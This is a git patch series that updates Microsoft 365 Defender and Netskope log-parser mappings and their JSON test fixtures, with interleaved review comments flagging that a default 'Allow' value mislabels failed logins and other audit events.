"9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "InitiatingProcessFileSize": 14687048, + "InitiatingProcessLogonId": "121834210", + "InitiatingProcessVersionInfoCompanyName": "Google", + "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", + "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", + "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", + "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", + "InitiatingProcessVersionInfoProductVersion": "102.286.200" }, "type": "NtAllocateVirtualMemoryApiCall" }, 
diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_info.json b/Microsoft/microsoft-365-defender/tests/test_identity_info.json index f1753e2d7..0a0174b85 100644 --- a/Microsoft/microsoft-365-defender/tests/test_identity_info.json +++ b/Microsoft/microsoft-365-defender/tests/test_identity_info.json 
@@ -16,18 +16,16 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "FileSize": 14687048, - "LogonId": "121834210", - "VersionInfoCompanyName": "Google", - "VersionInfoFileDescription": "Software Reporter Tool", - "VersionInfoInternalFileName": "software_reporter_tool_exe", - "VersionInfoOriginalFileName": "software_reporter_tool.exe", - "VersionInfoProductName": "Software Reporter Tool", - "VersionInfoProductVersion": "102.286.200" - } + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "InitiatingProcessFileSize": 14687048, + "InitiatingProcessLogonId": "121834210", + "InitiatingProcessVersionInfoCompanyName": "Google", + "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", + "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", + "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", + "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", + "InitiatingProcessVersionInfoProductVersion": "102.286.200" }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_logon.json b/Microsoft/microsoft-365-defender/tests/test_identity_logon.json index 3e55ad2b0..6077ecfdc 100644 --- a/Microsoft/microsoft-365-defender/tests/test_identity_logon.json 
+++ b/Microsoft/microsoft-365-defender/tests/test_identity_logon.json @@ -16,18 +16,16 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "FileSize": 14687048, - "LogonId": "121834210", - "VersionInfoCompanyName": "Google", - "VersionInfoFileDescription": "Software Reporter Tool", - "VersionInfoInternalFileName": "software_reporter_tool_exe", - "VersionInfoOriginalFileName": "software_reporter_tool.exe", - "VersionInfoProductName": "Software Reporter Tool", - "VersionInfoProductVersion": "102.286.200" - } + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "InitiatingProcessFileSize": 14687048, + "InitiatingProcessLogonId": "121834210", + "InitiatingProcessVersionInfoCompanyName": "Google", + "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", + "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", + "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", + "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", + "InitiatingProcessVersionInfoProductVersion": "102.286.200" }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_query.json b/Microsoft/microsoft-365-defender/tests/test_identity_query.json index 55684497d..f33a1eb87 100644 
--- a/Microsoft/microsoft-365-defender/tests/test_identity_query.json +++ b/Microsoft/microsoft-365-defender/tests/test_identity_query.json @@ -16,18 +16,16 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "FileSize": 14687048, - "LogonId": "121834210", - "VersionInfoCompanyName": "Google", - "VersionInfoFileDescription": "Software Reporter Tool", - "VersionInfoInternalFileName": "software_reporter_tool_exe", - "VersionInfoOriginalFileName": "software_reporter_tool.exe", - "VersionInfoProductName": "Software Reporter Tool", - "VersionInfoProductVersion": "102.286.200" - } + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "InitiatingProcessFileSize": 14687048, + "InitiatingProcessLogonId": "121834210", + "InitiatingProcessVersionInfoCompanyName": "Google", + "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", + "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", + "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", + "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", + "InitiatingProcessVersionInfoProductVersion": "102.286.200" }, "type": "NtAllocateVirtualMemoryApiCall" }, 
diff --git a/Microsoft/microsoft-365-defender/tests/test_local_ip.json b/Microsoft/microsoft-365-defender/tests/test_local_ip.json index 5a6e54961..3cedbfdb3 100644 --- a/Microsoft/microsoft-365-defender/tests/test_local_ip.json +++ b/Microsoft/microsoft-365-defender/tests/test_local_ip.json 
@@ -16,18 +16,16 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "FileSize": 14687048, - "LogonId": "121834210", - "VersionInfoCompanyName": "Google", - "VersionInfoFileDescription": "Software Reporter Tool", - "VersionInfoInternalFileName": "software_reporter_tool_exe", - "VersionInfoOriginalFileName": "software_reporter_tool.exe", - "VersionInfoProductName": "Software Reporter Tool", - "VersionInfoProductVersion": "102.286.200" - } + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "InitiatingProcessFileSize": 14687048, + "InitiatingProcessLogonId": "121834210", + "InitiatingProcessVersionInfoCompanyName": "Google", + "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", + "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", + "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", + "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", + "InitiatingProcessVersionInfoProductVersion": "102.286.200" }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_process_error.json b/Microsoft/microsoft-365-defender/tests/test_process_error.json index 9304ca1cb..2f5082094 100644 --- a/Microsoft/microsoft-365-defender/tests/test_process_error.json 
+++ b/Microsoft/microsoft-365-defender/tests/test_process_error.json @@ -22,14 +22,10 @@ "@timestamp": "2024-09-24T14:18:11.864114Z", "action": { "properties": { - "LogonId": "0", - "process": { - "parent": { - "CommandLine": "/usr/test/platform-python /usr/lib/python3.6/run.py --register", - "FileSize": 11864, - "LogonId": "0" - } - } + "InitiatingProcessCommandLine": "/usr/test/platform-python /usr/lib/python3.6/run.py --register", + "InitiatingProcessFileSize": 11864, + "InitiatingProcessLogonId": "0", + "LogonId": "0" }, "type": "ProcessCreated" }, From c1d52ac1ccb3dd44390361ce5806be9a8d31570c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?L=C3=A9na=C3=AFg?= <126670263+LenaigKaliou@users.noreply.github.com> Date: Thu, 28 Nov 2024 09:40:42 +0100 Subject: [PATCH 75/84] Update Netskope/netskope_events/ingest/parser.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Sébastien Quioc --- Netskope/netskope_events/ingest/parser.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/Netskope/netskope_events/ingest/parser.yml b/Netskope/netskope_events/ingest/parser.yml index 7ce3a2543..b4606f079 100644 --- a/Netskope/netskope_events/ingest/parser.yml +++ b/Netskope/netskope_events/ingest/parser.yml @@ -36,7 +36,8 @@ stages: "@timestamp": "{{parse_date.datetime}}" observer.vendor: "Netskope" event.dataset: "{{parsed_event.message.type}}" - event.action: "{{parsed_event.message.action or parsed_event.message.activity or 'Allow'}}" + event.action: "{{parsed_event.message.activity}}" + action.name: "{{parsed_event.message.action or 'Allow'}}" event.reason: "{{parsed_event.message.audit_log_event or parsed_event.message.bypass_reason}}" event.duration: "{{parsed_event.message.conn_duration}}" user_agent.original: "{{parsed_event.message.user_agent}}" From bbb2d8c5d99a2b154a4a8aeb127d12968cbc8b97 Mon Sep 17 00:00:00 2001 
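Review bot: `action.name: "{{parsed_event.message.action or 'Allow'}}"` fabricates an `Allow` verdict for every record whose source carries no `action` field, which is the case for the admin audit logs and connection logs in this series: the updated fixtures assert `action.name: Allow` for a `Login Failed` audit event whose message has no `action` key at all. A rule or dashboard filtering on `action.name == "Allow"` would then count failed logins and action-less audit records as allowed activity. Drop the fallback so the field is only set when the vendor sent one, `action.name: "{{parsed_event.message.action}}"`, and if a default is really wanted for policy events, gate it on `parsed_event.message.type` rather than applying it to every event type. Note also that `event.action` is now empty for event types without `activity` (the audit logs), where the old expression always produced a value — confirm downstream consumers of `event.action` tolerate its absence. The enclosing `stages` mapping starts and ends outside the hunk.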
From: LenaigKaliou Date: Thu, 28 Nov 2024 09:46:49 +0100 Subject: [PATCH 76/84] Fixing tests --- .../tests/test_audit_log_deleted_inline_policy.json | 4 +++- .../tests/test_audit_log_edit_admin_record.json | 4 +++- .../netskope_events/tests/test_audit_log_login_failed.json | 4 +++- .../tests/test_audit_log_login_successful.json | 4 +++- .../tests/test_audit_log_logout_successful.json | 4 +++- .../tests/test_audit_log_password_change_successful.json | 4 +++- Netskope/netskope_events/tests/test_connection_log.json | 4 +++- Netskope/netskope_events/tests/test_dlp_incident.json | 3 +++ Netskope/netskope_events/tests/test_malware_alert.json | 5 ++++- Netskope/netskope_events/tests/test_nspolicy_block.json | 5 ++++- Netskope/netskope_events/tests/test_nspolicy_log.json | 3 +++ Netskope/netskope_events/tests/test_nspolicy_upload.json | 3 +++ Netskope/netskope_events/tests/test_user_alert.json | 5 ++++- 13 files changed, 42 insertions(+), 10 deletions(-) diff --git a/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json b/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json index df70ea26e..c564471d7 100644 --- a/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json +++ b/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json @@ -5,7 +5,6 @@ "expected": { "message": "{\n \"timestamp\": 1651451341,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 2,\n \"audit_log_event\": \"Deleted inline policy\",\n \"supporting_data\": {\n \"data_type\": \"policy\",\n \"data_values\": [\n false\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"acfa7348-64c5-40de-b28d-202c8362d0f7\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { - "action": "Allow", "category": [ "configuration" ], 
@@ -17,6 +16,9 @@ ] }, "@timestamp": "2022-05-02T00:29:01Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json b/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json index 10b406a5f..952e5c0b6 100644 --- a/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json +++ b/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json @@ -5,7 +5,6 @@ "expected": { "message": "{\n \"timestamp\": 1651489787,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 1,\n \"audit_log_event\": \"Edit admin record\",\n \"supporting_data\": {\n \"data_type\": \"admin\",\n \"data_values\": [\n \"admin@example.org\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"275a263c8f8d4b7d9e12bf65b9094116\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { - "action": "Allow", "category": [ "configuration" ], @@ -17,6 +16,9 @@ ] }, "@timestamp": "2022-05-02T11:09:47Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_login_failed.json b/Netskope/netskope_events/tests/test_audit_log_login_failed.json index 8a792a408..05b0456e2 100644 --- a/Netskope/netskope_events/tests/test_audit_log_login_failed.json +++ b/Netskope/netskope_events/tests/test_audit_log_login_failed.json 
@@ -5,7 +5,6 @@ "expected": { "message": "{\n \"timestamp\": 1651494031,\n \"type\": \"admin_audit_logs\",\n \"user\": \"student13\",\n \"severity_level\": 1,\n \"audit_log_event\": \"Login Failed\",\n \"supporting_data\": {\n \"data_type\": \"user\",\n \"data_values\": [\n \"4.5.6.7\",\n \"student13\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"student13\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"60d81a80b26149b8a910dfffc48cbf41\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { - "action": "Allow", "category": [ "authentication" ], @@ -17,6 +16,9 @@ ] }, "@timestamp": "2022-05-02T12:20:31Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_login_successful.json b/Netskope/netskope_events/tests/test_audit_log_login_successful.json index 01549d366..cf808efde 100644 --- a/Netskope/netskope_events/tests/test_audit_log_login_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_login_successful.json @@ -5,7 +5,6 @@ "expected": { "message": "{\n \"timestamp\": 1671727087,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 2,\n \"audit_log_event\": \"Login Successful\",\n \"supporting_data\": {\n \"data_type\": \"user\",\n \"data_values\": [\n \"1.2.3.4\",\n \"john.doe@example.org\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"45b78fd638944e9ca0c6d92dfe2d4815\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { - "action": "Allow", "category": [ "authentication" ], @@ -17,6 +16,9 @@ ] }, "@timestamp": "2022-12-22T16:38:07Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { 
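Review bot: The new expected block `"action": { "name": "Allow" }` on the `Login Failed` admin audit fixture pins a value the input never contained — the message has no `action` field, so the `Allow` comes solely from the parser's hard-coded fallback. A fixture should assert what the vendor sent rather than a synthesized verdict that contradicts a failed authentication attempt; I would drop the `action` object from this expected output (and from the sibling audit-log fixtures) and have the parser emit `action.name` only when the source provides it. As written, the test locks in the misleading label instead of catching it.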
diff --git a/Netskope/netskope_events/tests/test_audit_log_logout_successful.json b/Netskope/netskope_events/tests/test_audit_log_logout_successful.json index 12e39be95..fb06271d6 100644 --- a/Netskope/netskope_events/tests/test_audit_log_logout_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_logout_successful.json @@ -5,7 +5,6 @@ "expected": { "message": "{\n \"timestamp\": 1670409967,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 2,\n \"audit_log_event\": \"Logout Successful\",\n \"supporting_data\": {\n \"data_type\": \"reason\",\n \"data_values\": [\n \"Logged out due to inactivity\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"e0272abae25442f681d0dbbef65b67e9\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { - "action": "Allow", "category": [ "authentication" ], @@ -17,6 +16,9 @@ ] }, "@timestamp": "2022-12-07T10:46:07Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json b/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json index a2fa885de..667c5755e 100644 --- a/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json 
@@ -5,7 +5,6 @@ "expected": { "message": "{\n \"timestamp\": 1651489787,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 1,\n \"audit_log_event\": \"Password Change Successful\",\n \"supporting_data\": {\n \"data_type\": \"user\",\n \"data_values\": [\n \"1.2.3.4\",\n \"admin@example.org\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"47e7e59a6ffa4662be63836a0f898b16\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { - "action": "Allow", "category": [ "iam" ], @@ -17,6 +16,9 @@ ] }, "@timestamp": "2022-05-02T11:09:47Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_connection_log.json b/Netskope/netskope_events/tests/test_connection_log.json index 5c5218356..996cd6263 100644 --- a/Netskope/netskope_events/tests/test_connection_log.json +++ b/Netskope/netskope_events/tests/test_connection_log.json 
@@ -5,7 +5,6 @@ "expected": { "message": "{\n \"_id\": \"69573873d4de0a4f1d2cbac4\",\n \"access_method\": \"Client\",\n \"app\": \"Swile\",\n \"appcategory\": \"HR\",\n \"bypass_reason\": \"SSL Do Not Decrypt Bypass Policy Matched\",\n \"bypass_traffic\": \"yes\",\n \"category\": \"HR\",\n \"cci\": 16,\n \"ccl\": \"poor\",\n \"connection_id\": 0,\n \"count\": 1,\n \"domain\": \"test.example.org\",\n \"dst_country\": \"FR\",\n \"dst_geoip_src\": 1,\n \"dst_latitude\": 48.85836410522461,\n \"dst_location\": \"Paris\",\n \"dst_longitude\": 2.294532060623169,\n \"dst_region\": \"Ile-de-France\",\n \"dst_timezone\": \"Europe/Paris\",\n \"dst_zipcode\": \"N/A\",\n \"dstip\": \"5.6.7.8\",\n \"dstport\": 443,\n \"netskope_pop\": \"FR-PAR1\",\n \"organization_unit\": \"\",\n \"other_categories\": [\n \"Finance/Accounting\",\n \"All Categories\",\n \"HR\"\n ],\n \"page\": \"test.example.org\",\n \"policy\": \"bypass_ssl for regulation purpose\",\n \"request_id\": 1111111111111111111,\n \"site\": \"Swile\",\n \"src_country\": \"FR\",\n \"src_geoip_src\": 2,\n \"src_latitude\": 48.11,\n \"src_location\": \"Rennes\",\n \"src_longitude\": -1.6744,\n \"src_region\": \"Brittany\",\n \"src_time\": \"Wed Dec 21 17:12:00 2022\",\n \"src_timezone\": \"Europe/Paris\",\n \"src_zipcode\": \"35000\",\n \"srcip\": \"4.5.6.7\",\n \"ssl_decrypt_policy\": \"yes\",\n \"timestamp\": 1671639140,\n \"traffic_type\": \"CloudApp\",\n \"transaction_id\": 0,\n \"type\": \"connection\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"url\": \"test.example.org\",\n \"user\": \"john.doe@example.org\",\n \"user_generated\": \"yes\",\n \"userip\": \"1.2.3.4\",\n \"userkey\": \"john.doe@example.org\",\n \"org\": \"\",\n \"http_transaction_count\": 0,\n \"network\": \"\",\n \"useragent\": \"\",\n \"dsthost\": \"\",\n \"numbytes\": 0,\n \"CononicalName\": \"\",\n \"os_version\": \"\",\n \"browser_session_id\": 0,\n \"resp_cnt\": 0,\n \"log_file_name\": \"\",\n \"suppression_end_time\": 0,\n 
\"browser_version\": \"\",\n \"severity\": \"\",\n \"client_bytes\": 0,\n \"suppression_start_time\": 0,\n \"app_session_id\": 0,\n \"sAMAccountName\": \"\",\n \"req_cnt\": 0,\n \"device\": \"\",\n \"browser\": \"\",\n \"userPrincipalName\": \"\",\n \"conn_endtime\": 1671639139,\n \"conn_duration\": 3,\n \"protocol\": \"\",\n \"fromlogs\": \"\",\n \"serial\": \"\",\n \"resp_content_len\": 0,\n \"dynamic_classification\": \"\",\n \"hostname\": \"\",\n \"os\": \"\",\n \"server_bytes\": 0,\n \"conn_starttime\": 1671639136,\n \"sessionid\": \"\",\n \"resp_content_type\": \"\"\n}\n", "event": { - "action": "Allow", "category": [ "network" ], @@ -20,6 +19,9 @@ ] }, "@timestamp": "2022-12-21T16:12:20Z", + "action": { + "name": "Allow" + }, "destination": { "address": "5.6.7.8", "bytes": 0, diff --git a/Netskope/netskope_events/tests/test_dlp_incident.json b/Netskope/netskope_events/tests/test_dlp_incident.json index 37ab6e32b..b3cb772d3 100644 --- a/Netskope/netskope_events/tests/test_dlp_incident.json +++ b/Netskope/netskope_events/tests/test_dlp_incident.json @@ -16,6 +16,9 @@ ] }, "@timestamp": "2023-01-31T08:11:53Z", + "action": { + "name": "Allow" + }, "cloud": { "instance": { "id": "example.org" diff --git a/Netskope/netskope_events/tests/test_malware_alert.json b/Netskope/netskope_events/tests/test_malware_alert.json index 5e5f6de15..e1a0a66c5 100644 --- a/Netskope/netskope_events/tests/test_malware_alert.json +++ b/Netskope/netskope_events/tests/test_malware_alert.json 
@@ -5,7 +5,7 @@ "expected": { "message": "{\n \"_id\": \"882049056ee9e069c1c329b7\",\n \"access_method\": \"Client\",\n \"action\": \"Detection\",\n \"activity\": \"Download\",\n \"alert\": \"yes\",\n \"alert_type\": \"Malware\",\n \"app\": \"eicar\",\n \"app_session_id\": 111111111111111111,\n \"appcategory\": \"n/a\",\n \"browser\": \"Safari\",\n \"category\": \"n/a\",\n \"cci\": \"\",\n \"ccl\": \"unknown\",\n \"connection_id\": 0,\n \"count\": 1,\n \"device\": \"Mac Device\",\n \"dst_country\": \"US\",\n \"dst_geoip_src\": 2,\n \"dst_latitude\": 47.6711,\n \"dst_location\": \"Redmond\",\n \"dst_longitude\": -122.1253,\n \"dst_region\": \"Washington\",\n \"dst_timezone\": \"America/Los_Angeles\",\n \"dst_zipcode\": \"98073\",\n \"dstip\": \"5.6.7.8\",\n \"file_path\": \"NA\",\n \"file_size\": 308,\n \"file_type\": \"File Type Not Detected\",\n \"hostname\": \"MacBook Pro\",\n \"instance\": null,\n \"managementID\": \"99999999999999999999999999999999\",\n \"md5\": \"68b329da9893e34099c7d8ad5cb9c940\",\n \"mime_type\": \"\",\n \"nsdeviceuid\": \"BC848089-186A-4F2D-A26F-E5CC94C29E56\",\n \"object\": \"eicarcom2.zip\",\n \"object_id\": \"68b329da9893e34099c7d8ad5cb9c940\",\n \"object_type\": \"File\",\n \"organization_unit\": \"\",\n \"os\": \"Monterey\",\n \"referer\": \"https://www.eicar.org/\",\n \"request_id\": 2222222222222222222,\n \"severity\": \"high\",\n \"site\": \"eicar\",\n \"src_country\": \"FR\",\n \"src_geoip_src\": 2,\n \"src_latitude\": 48.11,\n \"src_location\": \"Rennes\",\n \"src_longitude\": -1.6744,\n \"src_region\": \"Brittany\",\n \"src_timezone\": \"Europe/Paris\",\n \"src_zipcode\": \"35000\",\n \"srcip\": \"4.3.2.1\",\n \"timestamp\": 1671631928,\n \"title\": \"eicarcom2.zip\",\n \"traffic_type\": \"CloudApp\",\n \"transaction_id\": 3333333333333333333,\n \"tss_mode\": \"inline\",\n \"type\": \"nspolicy\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"url\": \"secure.eicar.org/eicarcom2.zip\",\n \"user\": \"john.doe@example.org\",\n 
\"user_id\": \"john.doe@example.org\",\n \"userip\": \"1.2.3.4\",\n \"userkey\": \"john.doe@example.org\",\n \"dlp_file\": \"\",\n \"data_center\": \"\",\n \"browser_version\": \"\",\n \"owner\": \"\",\n \"dlp_incident_id\": 0,\n \"channel_id\": \"\",\n \"from_user_category\": \"\",\n \"resp_cnt\": 0,\n \"suppression_key\": \"\",\n \"loginurl\": \"\",\n \"total_collaborator_count\": 0,\n \"os_version\": \"\",\n \"dlp_rule\": \"\",\n \"dlp_mail_parent_id\": \"\",\n \"instance_id\": \"\",\n \"to_user\": \"\",\n \"suppression_end_time\": 0,\n \"fromlogs\": \"\",\n \"dlp_parent_id\": 0,\n \"dstport\": 0,\n \"dst_timezone\": \"\",\n \"serial\": \"\",\n \"audit_category\": \"\",\n \"sha256\": \"\",\n \"from_user\": \"\",\n \"sAMAccountName\": \"\",\n \"app_activity\": \"\",\n \"useragent\": \"\",\n \"netskope_activity\": \"\",\n \"conn_duration\": 0,\n \"other_categories\": [],\n \"custom_connector\": \"\",\n \"dlp_rule_severity\": \"\",\n \"numbytes\": 0,\n \"telemetry_app\": \"\",\n \"true_obj_category\": \"\",\n \"userPrincipalName\": \"\",\n \"logintype\": \"\",\n \"suppression_start_time\": 0,\n \"browser_session_id\": 0,\n \"dlp_profile\": \"\",\n \"src_time\": \"\",\n \"modified\": 0,\n \"policy\": \"\",\n \"policy_id\": \"\",\n \"notify_template\": \"\",\n \"audit_type\": \"\",\n \"orignal_file_path\": \"\",\n \"dlp_is_unique_count\": \"\",\n \"org\": \"\",\n \"user_category\": \"\",\n \"dlp_unique_count\": 0,\n \"exposure\": \"\",\n \"netskope_pop\": \"\",\n \"shared_with\": \"\",\n \"client_bytes\": 0,\n \"sanctioned_instance\": \"\",\n \"device_classification\": \"\",\n \"data_type\": \"\",\n \"scan_type\": \"\",\n \"internal_collaborator_count\": 0,\n \"CononicalName\": \"\",\n \"workspace\": \"\",\n \"log_file_name\": \"\",\n \"parent_id\": \"\",\n \"true_obj_type\": \"\",\n \"dlp_rule_count\": 0,\n \"sessionid\": \"\",\n \"workspace_id\": \"\",\n \"page_site\": \"\",\n \"universal_connector\": \"\",\n \"server_bytes\": 0,\n \"req_cnt\": 0,\n \"file_lang\": 
\"\",\n \"protocol\": \"\",\n \"web_universal_connector\": \"\",\n \"dsthost\": \"\",\n \"appsuite\": \"\",\n \"managed_app\": \"\",\n \"page\": \"\"\n}\n", "event": { - "action": "Detection", + "action": "Download", "category": [ "malware" ], @@ -17,6 +17,9 @@ ] }, "@timestamp": "2022-12-21T14:12:08Z", + "action": { + "name": "Detection" + }, "destination": { "address": "5.6.7.8", "bytes": 0, diff --git a/Netskope/netskope_events/tests/test_nspolicy_block.json b/Netskope/netskope_events/tests/test_nspolicy_block.json index 0d739d4fd..404b5d4ab 100644 --- a/Netskope/netskope_events/tests/test_nspolicy_block.json +++ b/Netskope/netskope_events/tests/test_nspolicy_block.json 
